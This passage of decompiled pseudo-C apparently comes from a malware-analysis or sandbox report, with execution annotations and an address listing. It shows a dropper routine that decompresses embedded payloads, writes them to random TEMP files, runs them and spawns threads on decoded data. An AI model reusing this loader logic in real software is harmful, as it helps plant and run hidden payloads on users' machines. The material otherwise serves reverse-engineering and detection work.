                                                                                                                                                                                                                                                                                                        								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                                                        								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								__eflags = _v40;
                                                                                                                                                                                                                                                                                                        								if(_v40 == 0) {
                                                                                                                                                                                                                                                                                                        									L19:
                                                                                                                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t439 = E024E6260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                                                        								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                                                        								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                                                        									_t442 = E024E1EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                                                        									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								goto L19;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v36 =  *_v20;
                                                                                                                                                                                                                                                                                                        								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                                                        								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									return 0;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v13 = 0;
                                                                                                                                                                                                                                                                                                        						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                                        						_v48 = 0;
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                                                        							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__eflags = _v48;
                                                                                                                                                                                                                                                                                                        							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                                                                                                                        								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                                        								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee274; // 0x2
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									L39:
                                                                                                                                                                                                                                                                                                        									_t448 = _v20;
                                                                                                                                                                                                                                                                                                        									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                                        									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee270; // 0x1
                                                                                                                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        											L90:
                                                                                                                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee278; // 0x3
                                                                                                                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        												L93:
                                                                                                                                                                                                                                                                                                        												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee27c; // 0x4
                                                                                                                                                                                                                                                                                                        												if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        													_v13 = 1;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												L95:
                                                                                                                                                                                                                                                                                                        												L24:
                                                                                                                                                                                                                                                                                                        												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                                                        												__eflags = _t452;
                                                                                                                                                                                                                                                                                                        												_v48 = _t452;
                                                                                                                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee288; // 0x2
                                                                                                                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        												goto L93;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											_t317 =  *0x24ee28c; // 0x24f3f88
                                                                                                                                                                                                                                                                                                        											_t455 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        											E024EA360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                                                        											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                                        											goto L95;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee284; // 0x1
                                                                                                                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        											goto L90;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t321 = E024E7250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                                        										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        											_t528 = _v20;
                                                                                                                                                                                                                                                                                                        											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                                                        											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                                                        												L48:
                                                                                                                                                                                                                                                                                                        												_t529 = _v20;
                                                                                                                                                                                                                                                                                                        												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                                                        												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                        													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                                                        													E024E7D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                                                        													E024E9730( &_v932, 4);
                                                                                                                                                                                                                                                                                                        													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                                        													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                                                        													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                                        													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        														L89:
                                                                                                                                                                                                                                                                                                        														goto L24;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_v1200 = 0;
                                                                                                                                                                                                                                                                                                        													_v1204 = 0;
                                                                                                                                                                                                                                                                                                        													_v1208 = _v56;
                                                                                                                                                                                                                                                                                                        													_t333 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                                        														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        														__eflags = _v1212;
                                                                                                                                                                                                                                                                                                        														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                                                        															_t349 = E024E6260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                                                        															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                                                        															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                                                        																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                                                        																_v1208 = _v1216;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													__eflags = _v1204;
                                                                                                                                                                                                                                                                                                        													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                                                        														L88:
                                                                                                                                                                                                                                                                                                        														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                                                        														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                                                        															goto L88;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                                        														_t340 = E024E1E60( &_v916);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        														_v1220 = _t340;
                                                                                                                                                                                                                                                                                                        														__eflags = _v1220;
                                                                                                                                                                                                                                                                                                        														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                                                        															_t465 = _v20;
                                                                                                                                                                                                                                                                                                        															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                                                        															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                                        																E024E73C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_t539 = _v20;
                                                                                                                                                                                                                                                                                                        															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                                        															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        																E024E2510(_v1220, 0x24ee290);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_v8 = 1;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													goto L89;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												_v636 = 0;
                                                                                                                                                                                                                                                                                                        												_v632 = 0;
                                                                                                                                                                                                                                                                                                        												_v640 = 0;
                                                                                                                                                                                                                                                                                                        												_t472 = _v20;
                                                                                                                                                                                                                                                                                                        												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        													_t355 = E024E2070(_v52);
                                                                                                                                                                                                                                                                                                        													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        													_v636 = _t355;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                                        													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        													_v644 = _t378;
                                                                                                                                                                                                                                                                                                        													__eflags = _v644;
                                                                                                                                                                                                                                                                                                        													if(_v644 != 0) {
                                                                                                                                                                                                                                                                                                        														_t381 = E024E6260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                                                        														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                                                        														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                                                        															_t383 = E024E2070(_v644); // executed
                                                                                                                                                                                                                                                                                                        															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        															_v636 = _t383;
                                                                                                                                                                                                                                                                                                        															_t563 = _v20;
                                                                                                                                                                                                                                                                                                        															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                                        															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        																_v632 = _t386;
                                                                                                                                                                                                                                                                                                        																E024E7B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												__eflags = _v636;
                                                                                                                                                                                                                                                                                                        												if(_v636 != 0) {
                                                                                                                                                                                                                                                                                                        													_t473 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                                                        													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                                        														E024E73C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t549 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                                        													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        														_t361 = E024E97A0(0x10);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        														_v1228 = _t361;
                                                                                                                                                                                                                                                                                                        														_v648 = _v1228;
                                                                                                                                                                                                                                                                                                        														_t551 = _v20;
                                                                                                                                                                                                                                                                                                        														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        															__eflags =  *_v648;
                                                                                                                                                                                                                                                                                                        															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                                        																E024E7B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															 *_v648 = _v632;
                                                                                                                                                                                                                                                                                                        															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														__eflags =  *_v648;
                                                                                                                                                                                                                                                                                                        														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                                        															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                                        															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                                                        															_t368 = CreateThread(0, 0, E024E77B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        															_v652 = _t368;
                                                                                                                                                                                                                                                                                                        															CloseHandle(_v652);
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t550 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                                        													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        														E024E2510(_v636, 0x24ee290);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_v8 = 1;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												goto L24;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        											__eflags = _v620;
                                                                                                                                                                                                                                                                                                        											if(_v620 == 0) {
                                                                                                                                                                                                                                                                                                        												goto L48;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											E024E7B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                                                        											_t393 = E024E97A0(0x20);
                                                                                                                                                                                                                                                                                                        											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                                        											_v1224 = _t393;
                                                                                                                                                                                                                                                                                                        											_v624 = _v1224;
                                                                                                                                                                                                                                                                                                        											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                                                        											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                                                        											_v628 = CreateThread(0, 0, E024E6DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                                                        											CloseHandle(_v628);
                                                                                                                                                                                                                                                                                                        											goto L24;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										goto L24;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L24;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee284; // 0x1
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                                        								E024E7D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                                        								E024E9730( &_v340, 4);
                                                                                                                                                                                                                                                                                                        								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                                        								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                                        								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                                                        								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v608 = 0;
                                                                                                                                                                                                                                                                                                        								_v612 = 0;
                                                                                                                                                                                                                                                                                                        								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                                                        								__eflags = _t415;
                                                                                                                                                                                                                                                                                                        								if(_t415 == 0) {
                                                                                                                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                                                                                                                        									__eflags = _v608;
                                                                                                                                                                                                                                                                                                        									if(_v608 == 0) {
                                                                                                                                                                                                                                                                                                        										CloseHandle(_v328);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                                                        								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                                                        								E024E6C60();
                                                                                                                                                                                                                                                                                                        								_t421 = E024E1E60( &_v324);
                                                                                                                                                                                                                                                                                                        								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        								_v616 = _t421;
                                                                                                                                                                                                                                                                                                        								__eflags = _v616;
                                                                                                                                                                                                                                                                                                        								if(_v616 == 0) {
                                                                                                                                                                                                                                                                                                        									E024E6CF0();
                                                                                                                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								E024E74A0();
                                                                                                                                                                                                                                                                                                        								ExitProcess(0);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v60 =  *_v20;
                                                                                                                                                                                                                                                                                                        							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                                                        							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                                                        							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                                        								goto L29;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                                                        						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                                        							 *0x24f30e4 = 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *0x24f30e4 = 2;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L99;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
















































































                                                                                                                                                                                                                                                                                                        0x024e62b9
                                                                                                                                                                                                                                                                                                        0x024e62c4
                                                                                                                                                                                                                                                                                                        0x024e6c4e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e62d4
                                                                                                                                                                                                                                                                                                        0x024e62d9
                                                                                                                                                                                                                                                                                                        0x024e62e0
                                                                                                                                                                                                                                                                                                        0x024e62f9
                                                                                                                                                                                                                                                                                                        0x024e62fc
                                                                                                                                                                                                                                                                                                        0x024e630e
                                                                                                                                                                                                                                                                                                        0x024e631e
                                                                                                                                                                                                                                                                                                        0x024e6343
                                                                                                                                                                                                                                                                                                        0x024e6349
                                                                                                                                                                                                                                                                                                        0x024e6354
                                                                                                                                                                                                                                                                                                        0x024e635d
                                                                                                                                                                                                                                                                                                        0x024e6363
                                                                                                                                                                                                                                                                                                        0x024e6429
                                                                                                                                                                                                                                                                                                        0x024e6308
                                                                                                                                                                                                                                                                                                        0x024e6308
                                                                                                                                                                                                                                                                                                        0x024e630b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e630b
                                                                                                                                                                                                                                                                                                        0x024e636f
                                                                                                                                                                                                                                                                                                        0x024e6375
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e637b
                                                                                                                                                                                                                                                                                                        0x024e6381
                                                                                                                                                                                                                                                                                                        0x024e6384
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6391
                                                                                                                                                                                                                                                                                                        0x024e6393
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6399
                                                                                                                                                                                                                                                                                                        0x024e639f
                                                                                                                                                                                                                                                                                                        0x024e63a2
                                                                                                                                                                                                                                                                                                        0x024e6419
                                                                                                                                                                                                                                                                                                        0x024e641e
                                                                                                                                                                                                                                                                                                        0x024e6424
                                                                                                                                                                                                                                                                                                        0x024e6427
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6427
                                                                                                                                                                                                                                                                                                        0x024e63ad
                                                                                                                                                                                                                                                                                                        0x024e63c3
                                                                                                                                                                                                                                                                                                        0x024e63c6
                                                                                                                                                                                                                                                                                                        0x024e63ca
                                                                                                                                                                                                                                                                                                        0x024e640e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e640e
                                                                                                                                                                                                                                                                                                        0x024e63dc
                                                                                                                                                                                                                                                                                                        0x024e63e1
                                                                                                                                                                                                                                                                                                        0x024e63e4
                                                                                                                                                                                                                                                                                                        0x024e63ef
                                                                                                                                                                                                                                                                                                        0x024e63f4
                                                                                                                                                                                                                                                                                                        0x024e63fa
                                                                                                                                                                                                                                                                                                        0x024e63fa
                                                                                                                                                                                                                                                                                                        0x024e6408
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6320
                                                                                                                                                                                                                                                                                                        0x024e6325
                                                                                                                                                                                                                                                                                                        0x024e632e
                                                                                                                                                                                                                                                                                                        0x024e633a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e633c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e633c
                                                                                                                                                                                                                                                                                                        0x024e633a
                                                                                                                                                                                                                                                                                                        0x024e631e
                                                                                                                                                                                                                                                                                                        0x024e642e
                                                                                                                                                                                                                                                                                                        0x024e6438
                                                                                                                                                                                                                                                                                                        0x024e643b
                                                                                                                                                                                                                                                                                                        0x024e644d
                                                                                                                                                                                                                                                                                                        0x024e6450
                                                                                                                                                                                                                                                                                                        0x024e6453
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6459
                                                                                                                                                                                                                                                                                                        0x024e645d
                                                                                                                                                                                                                                                                                                        0x024e6482
                                                                                                                                                                                                                                                                                                        0x024e6488
                                                                                                                                                                                                                                                                                                        0x024e6493
                                                                                                                                                                                                                                                                                                        0x024e649c
                                                                                                                                                                                                                                                                                                        0x024e64a2
                                                                                                                                                                                                                                                                                                        0x024e65f3
                                                                                                                                                                                                                                                                                                        0x024e65f3
                                                                                                                                                                                                                                                                                                        0x024e65f9
                                                                                                                                                                                                                                                                                                        0x024e65fc
                                                                                                                                                                                                                                                                                                        0x024e6609
                                                                                                                                                                                                                                                                                                        0x024e660f
                                                                                                                                                                                                                                                                                                        0x024e6bdd
                                                                                                                                                                                                                                                                                                        0x024e6be3
                                                                                                                                                                                                                                                                                                        0x024e6be9
                                                                                                                                                                                                                                                                                                        0x024e6c18
                                                                                                                                                                                                                                                                                                        0x024e6c1e
                                                                                                                                                                                                                                                                                                        0x024e6c24
                                                                                                                                                                                                                                                                                                        0x024e6c26
                                                                                                                                                                                                                                                                                                        0x024e6c26
                                                                                                                                                                                                                                                                                                        0x024e6c2a
                                                                                                                                                                                                                                                                                                        0x024e6444
                                                                                                                                                                                                                                                                                                        0x024e6447
                                                                                                                                                                                                                                                                                                        0x024e6447
                                                                                                                                                                                                                                                                                                        0x024e644a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e644a
                                                                                                                                                                                                                                                                                                        0x024e6bf1
                                                                                                                                                                                                                                                                                                        0x024e6bf7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6c01
                                                                                                                                                                                                                                                                                                        0x024e6c07
                                                                                                                                                                                                                                                                                                        0x024e6c0e
                                                                                                                                                                                                                                                                                                        0x024e6c13
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6c13
                                                                                                                                                                                                                                                                                                        0x024e661b
                                                                                                                                                                                                                                                                                                        0x024e6621
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6633
                                                                                                                                                                                                                                                                                                        0x024e6638
                                                                                                                                                                                                                                                                                                        0x024e663e
                                                                                                                                                                                                                                                                                                        0x024e6640
                                                                                                                                                                                                                                                                                                        0x024e6647
                                                                                                                                                                                                                                                                                                        0x024e664a
                                                                                                                                                                                                                                                                                                        0x024e664e
                                                                                                                                                                                                                                                                                                        0x024e6752
                                                                                                                                                                                                                                                                                                        0x024e6752
                                                                                                                                                                                                                                                                                                        0x024e6758
                                                                                                                                                                                                                                                                                                        0x024e675b
                                                                                                                                                                                                                                                                                                        0x024e69cb
                                                                                                                                                                                                                                                                                                        0x024e69dc
                                                                                                                                                                                                                                                                                                        0x024e69ed
                                                                                                                                                                                                                                                                                                        0x024e69f2
                                                                                                                                                                                                                                                                                                        0x024e6a1a
                                                                                                                                                                                                                                                                                                        0x024e6a3c
                                                                                                                                                                                                                                                                                                        0x024e6a42
                                                                                                                                                                                                                                                                                                        0x024e6a49
                                                                                                                                                                                                                                                                                                        0x024e6bd6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6bd6
                                                                                                                                                                                                                                                                                                        0x024e6a4f
                                                                                                                                                                                                                                                                                                        0x024e6a59
                                                                                                                                                                                                                                                                                                        0x024e6a66
                                                                                                                                                                                                                                                                                                        0x024e6a6c
                                                                                                                                                                                                                                                                                                        0x024e6a72
                                                                                                                                                                                                                                                                                                        0x024e6a75
                                                                                                                                                                                                                                                                                                        0x024e6b3c
                                                                                                                                                                                                                                                                                                        0x024e6a7b
